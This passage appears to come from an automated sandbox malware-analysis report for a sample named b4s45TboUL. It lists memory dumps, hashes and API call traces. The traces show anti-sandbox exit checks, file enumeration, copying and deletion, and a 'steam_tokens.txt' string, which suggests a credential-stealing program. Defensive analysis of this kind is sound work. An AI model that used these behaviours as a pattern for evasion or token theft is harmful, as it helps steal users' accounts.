                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                • String ID:
                                                                                                • API String ID: 3183270410-0
                                                                                                • Opcode ID: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
                                                                                                • Instruction ID: 8add19ce2c94a4db983c162c5ea883653429c1f160fd421327fd5bffa921fc45
                                                                                                • Opcode Fuzzy Hash: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
                                                                                                • Instruction Fuzzy Hash: 95F03A7490120CEFDB14DBA4DD4AFEA7778BB08300F004599FA1997280E6B06E84CB95
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                                                                                • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                                                                                • ExitProcess.KERNEL32 ref: 00401143
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1103761159-0
                                                                                                • Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                                                                                • Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
                                                                                                • Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                                                                                • Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID: winRead
                                                                                                • API String ID: 2738559852-2759563040
                                                                                                • Opcode ID: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
                                                                                                • Instruction ID: 0463a8294cdaeeb391ba6f45b5ad466d8cdf6662135ec028d0205bc88dba3c8e
                                                                                                • Opcode Fuzzy Hash: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
                                                                                                • Instruction Fuzzy Hash: 2041E475A052699BCF04CFA8D88498EBBF2FF88314F618529E868A7354D730E941CB91
                                                                                                APIs
                                                                                                • VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID: @
                                                                                                • API String ID: 544645111-2766056989
                                                                                                • Opcode ID: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
                                                                                                • Instruction ID: 960187402ee01aff1aca01ef16381d87fa4c626a1601440f33a421b94010635f
                                                                                                • Opcode Fuzzy Hash: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
                                                                                                • Instruction Fuzzy Hash: D6213374A04208EFDB04CF88D544BADBBB1FF48304F1181AAD456AB381D3799A91DF85
                                                                                                APIs
                                                                                                • GetSystemInfo.KERNEL32(?,?,61ECC400,?,61E35248), ref: 61E354EB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoSystem
                                                                                                • String ID: HRa
                                                                                                • API String ID: 31276548-1004199025
                                                                                                • Opcode ID: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
                                                                                                • Instruction ID: 06cda1940385b8855eb11c4b22b944da250b3e82bd825487f891a332eec36e05
                                                                                                • Opcode Fuzzy Hash: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
                                                                                                • Instruction Fuzzy Hash: 56F03AB02083419BD704AFA4C60631FBAF5AFC6B09F66C82DD1858B380CB75D8559B93
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
                                                                                                • Instruction ID: fd8884a5b4d1e95754380b5432cffff504e2d4d7245242e6cdc6148b35b0e1b4
                                                                                                • Opcode Fuzzy Hash: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
                                                                                                • Instruction Fuzzy Hash: 816127B4900209DFCB14CF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95
                                                                                                APIs
                                                                                                  • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414E3A
                                                                                                • lstrcatA.KERNEL32(?,009745C0), ref: 00414E58
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                  • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                  • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                  • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                  • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                  • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                                                                                  • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                                                                                  • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,0096C4E8,?,000003E8), ref: 00414C9A
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                                                                                  • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                                                                                  • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C57
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                • String ID:
                                                                                                • API String ID: 2104210347-0
                                                                                                • Opcode ID: 58344700fbdd61abd122c35d019a996d05a4c8d79970382b44b34d8b8533b851
                                                                                                • Instruction ID: e9161ec81bcd1d29be655bd6d91fa6844fd782dbdf96c1af6834d1d6ae200bb8
                                                                                                • Opcode Fuzzy Hash: 58344700fbdd61abd122c35d019a996d05a4c8d79970382b44b34d8b8533b851
                                                                                                • Instruction Fuzzy Hash: F041B6B7E0410467C754F764FC52EEE333E9BC8304F40855EB54696191ED78AAC88B95
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentThread_beginthreadex
                                                                                                • String ID:
                                                                                                • API String ID: 982669324-0
                                                                                                • Opcode ID: f615dc7b7e999705fe73c8510302048efcb03f76f94e809957717ec93d4871f7
                                                                                                • Instruction ID: 42f2b6fd1f22f931f1f5e4e4650255a3aee80b5d1c0a6131159fee0115e9d0d4
                                                                                                • Opcode Fuzzy Hash: f615dc7b7e999705fe73c8510302048efcb03f76f94e809957717ec93d4871f7
                                                                                                • Instruction Fuzzy Hash: 193147B1E096498FDB01CFA8E4823DDBBF0BF49719F24806AD804AB344D774C940CB69
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                  • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00420ACE,?,?,?,?,?,?,0041635B,?), ref: 0041537A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpylstrlen
                                                                                                • String ID: steam_tokens.txt
                                                                                                • API String ID: 2001356338-401951677
                                                                                                • Opcode ID: 05c3bf2e8d49d1371e3a8ef3ba893d9939886e2072245d48c510c30610a2984f
                                                                                                • Instruction ID: 583e1202a90f05d24a8fafb6f0fe3048dc9e4c24137b9a3722a1f5dcf54c1db9
                                                                                                • Opcode Fuzzy Hash: 05c3bf2e8d49d1371e3a8ef3ba893d9939886e2072245d48c510c30610a2984f
                                                                                                • Instruction Fuzzy Hash: 5AF06D31E1110876CB04FBB2EC679ED733D9E50358F80426EB416220D2EF386698C7AE
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID: winClose
                                                                                                • API String ID: 2962429428-4219828513
                                                                                                • Opcode ID: c60c52094e65ead93584bd01b08d1abc788ebbc504c85440e44ebfbab32f71d9
                                                                                                • Instruction ID: 774f0b390e99eda96ce63d5266cab459109c075f265339c96ef3e2cb904a27c1
                                                                                                • Opcode Fuzzy Hash: c60c52094e65ead93584bd01b08d1abc788ebbc504c85440e44ebfbab32f71d9
                                                                                                • Instruction Fuzzy Hash: EBF09670B043259BE700AF75C5C4A5AFBA4EF89314F20C46DD8898B342D73AD944CB92
                                                                                                APIs
                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                                                                                • ExitProcess.KERNEL32 ref: 0040117E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitInfoProcessSystem
                                                                                                • String ID:
                                                                                                • API String ID: 752954902-0
                                                                                                • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                                                                                • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                                                                                • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                                                                                • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040B992
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040B9A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
